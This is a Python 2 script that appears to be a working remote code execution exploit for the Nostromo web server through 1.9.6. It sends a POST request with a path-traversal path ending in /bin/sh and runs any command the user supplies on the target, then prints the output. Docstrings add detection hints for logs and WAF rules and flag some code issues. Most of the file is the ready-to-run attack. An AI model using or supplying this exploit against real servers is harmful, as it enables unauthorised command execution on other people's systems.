#!/usr/bin/env python
import socket
import argparse
# Command-line interface: host and port are required; the command is
# optional and falls back to 'id' when omitted.
parser = argparse.ArgumentParser(
    description='RCE in Nostromo web server through 1.9.6 due to path traversal.',
)
parser.add_argument('host', help='domain/IP of the Nostromo web server')
parser.add_argument('port', type=int, help='port number')
parser.add_argument(
    'cmd',
    nargs='?',
    default='id',
    help='command to execute, default is id',
)
args = parser.parse_args()
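def recv(s):
    """Read from socket ``s`` until the peer closes or a socket error occurs.

    Returns everything received so far as a single string. A timeout or any
    other socket-level error ends the read early and the partial data is
    still returned. Exceptions that are not socket errors propagate to the
    caller instead of being silently discarded.
    """
    chunks = []
    try:
        while True:
            t = s.recv(1024)
            if not t:
                # Empty read: the peer closed the connection.
                break
            chunks.append(t)
    except socket.error:
        # Best-effort read: socket.timeout is a subclass of socket.error,
        # so the timeout set by the caller ends the loop here.
        pass
    return ''.join(chunks)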
def exploit(host,port,cmd):
    """Send one crafted HTTP/1.0 POST to host:port and print the reply body.

    The request path consists of repeated ``/.%0d./`` segments followed by
    ``/bin/sh``; the script's own description attributes this to a path
    traversal in Nostromo through 1.9.6. ``cmd`` is inserted into the request
    body unmodified.

    Defensive notes:
      * Request lines containing ``.%0d.`` path segments (``%0d`` is a
        URL-encoded carriage return), or a request path ending in
        ``/bin/sh``, are a usable detection signal in web-server logs or
        reverse-proxy/WAF rules.
      * The description states the affected range as "through 1.9.6", so
        servers on a later release are presumably not affected; verify
        against the vendor changelog.
    """
    s=socket.socket()
    # 1-second timeout: recv() below relies on it to stop reading when the
    # peer keeps the connection open.
    s.settimeout(1)
    s.connect((host,int(port)))
    payload="""POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1""".format(cmd)
    # NOTE(review): send() may transmit fewer bytes than given; its return
    # value is ignored here.
    s.send(payload)
    r=recv(s)
    # Drop the HTTP response headers; keep only what follows the blank line.
    # NOTE(review): index() raises ValueError when the reply has no
    # '\r\n\r\n' (for example an empty reply), so that case ends in a traceback.
    r=r[r.index('\r\n\r\n')+4:]
    # NOTE(review): the socket is never closed, and the print statement
    # makes this Python 2 only.
    print r
# Run once with the values parsed from the command line.
exploit(host=args.host, port=args.port, cmd=args.cmd)